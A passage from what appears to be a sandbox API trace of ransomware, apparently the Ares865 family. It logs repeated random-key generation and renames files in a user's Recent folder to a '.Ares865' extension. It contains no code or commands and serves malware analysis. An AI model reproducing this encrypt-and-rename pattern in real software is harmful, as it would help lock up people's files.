HALPmcxz\\Recent\\PVCkl1oeDfzyAB--.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pvckl1oedfzyab--.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.485] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1045) returned 1 [0093.485] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.486] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.486] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.486] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.487] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.487] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.488] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PXzjPVpVvbAMw.lnk.Ares865") returned 62 [0093.488] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PXzjPVpVvbAMw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pxzjpvpvvbamw.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PXzjPVpVvbAMw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pxzjpvpvvbamw.lnk.ares865"), dwFlags=0x1) returned 1 [0093.489] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PXzjPVpVvbAMw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pxzjpvpvvbamw.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.490] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3762) returned 1 [0093.490] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.491] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.491] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.492] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.492] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.492] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.494] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qaBK.lnk.Ares865") returned 53 [0093.494] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qaBK.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qabk.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qaBK.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qabk.lnk.ares865"), dwFlags=0x1) returned 1 [0093.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qaBK.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qabk.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.495] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2538) returned 1 [0093.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.496] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.496] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.496] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.497] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.497] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\QanWhg4S.lnk.Ares865") returned 57 [0093.498] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\QanWhg4S.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qanwhg4s.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\QanWhg4S.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qanwhg4s.lnk.ares865"), dwFlags=0x1) returned 1 [0093.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\QanWhg4S.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qanwhg4s.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.499] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=784) returned 1 [0093.500] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.500] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.500] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.501] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.501] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.501] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.503] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\QBcZn_ZLV8PkU4wab40c.ots.lnk.Ares865") returned 73 [0093.503] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\QBcZn_ZLV8PkU4wab40c.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qbczn_zlv8pku4wab40c.ots.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\QBcZn_ZLV8PkU4wab40c.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qbczn_zlv8pku4wab40c.ots.lnk.ares865"), dwFlags=0x1) returned 1 [0093.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\QBcZn_ZLV8PkU4wab40c.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qbczn_zlv8pku4wab40c.ots.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.504] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3848) returned 1 [0093.504] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.505] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.505] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.505] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.506] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.506] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.508] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Qgbqc1HcsyWD.flv.lnk.Ares865") returned 65 [0093.508] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Qgbqc1HcsyWD.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qgbqc1hcsywd.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Qgbqc1HcsyWD.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qgbqc1hcsywd.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.509] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Qgbqc1HcsyWD.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qgbqc1hcsywd.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.509] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=804) returned 1 [0093.509] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.510] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.510] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.510] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.511] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.512] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qMRTP.lnk.Ares865") returned 54 [0093.512] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qMRTP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qmrtp.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qMRTP.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qmrtp.lnk.ares865"), dwFlags=0x1) returned 1 [0093.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qMRTP.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qmrtp.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.513] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3755) returned 1 [0093.514] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.514] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.514] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.515] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.516] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.516] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.517] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qnBiFq1.lnk.Ares865") returned 56 [0093.517] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qnBiFq1.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qnbifq1.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qnBiFq1.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qnbifq1.lnk.ares865"), dwFlags=0x1) returned 1 [0093.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\qnBiFq1.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\qnbifq1.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.518] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=993) returned 1 [0093.519] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.519] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.519] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.520] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.520] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.520] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.522] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\R40wwifVtzvONs.lnk.Ares865") returned 63 [0093.522] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\R40wwifVtzvONs.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\r40wwifvtzvons.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\R40wwifVtzvONs.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\r40wwifvtzvons.lnk.ares865"), dwFlags=0x1) returned 1 [0093.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\R40wwifVtzvONs.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\r40wwifvtzvons.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.523] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2659) returned 1 [0093.523] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.524] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.524] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.524] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.525] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.525] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.526] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\R8OoLH7Lxp-IYl.lnk.Ares865") returned 63 [0093.526] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\R8OoLH7Lxp-IYl.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\r8oolh7lxp-iyl.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\R8OoLH7Lxp-IYl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\r8oolh7lxp-iyl.lnk.ares865"), dwFlags=0x1) returned 1 [0093.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\R8OoLH7Lxp-IYl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\r8oolh7lxp-iyl.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.528] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5306) returned 1 [0093.528] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.528] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.528] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.529] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.530] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.530] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.532] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\rCbZ3QPkVPU.lnk.Ares865") returned 60 [0093.532] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\rCbZ3QPkVPU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rcbz3qpkvpu.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\rCbZ3QPkVPU.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rcbz3qpkvpu.lnk.ares865"), dwFlags=0x1) returned 1 [0093.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\rCbZ3QPkVPU.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rcbz3qpkvpu.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.534] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6733) returned 1 [0093.534] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.535] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.535] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.535] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.536] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.536] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.537] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\REhVVs2rj.lnk.Ares865") returned 58 [0093.537] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\REhVVs2rj.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rehvvs2rj.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\REhVVs2rj.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rehvvs2rj.lnk.ares865"), dwFlags=0x1) returned 1 [0093.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\REhVVs2rj.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rehvvs2rj.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.539] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2572) returned 1 [0093.539] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.539] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.539] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.540] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.540] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.540] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.542] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\rfnt.lnk.Ares865") returned 53 [0093.542] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\rfnt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rfnt.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\rfnt.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rfnt.lnk.ares865"), dwFlags=0x1) returned 1 [0093.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\rfnt.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rfnt.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.551] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2538) returned 1 [0093.552] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.552] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.552] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.553] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.553] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.553] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.555] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Roaming.lnk.Ares865") returned 56 [0093.555] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Roaming.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\roaming.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Roaming.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\roaming.lnk.ares865"), dwFlags=0x1) returned 1 [0093.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Roaming.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\roaming.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.556] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=771) returned 1 [0093.556] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.557] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.557] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.557] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.558] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.558] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.559] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Rr5oj-4E-.lnk.Ares865") returned 58 [0093.559] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Rr5oj-4E-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rr5oj-4e-.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Rr5oj-4E-.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js 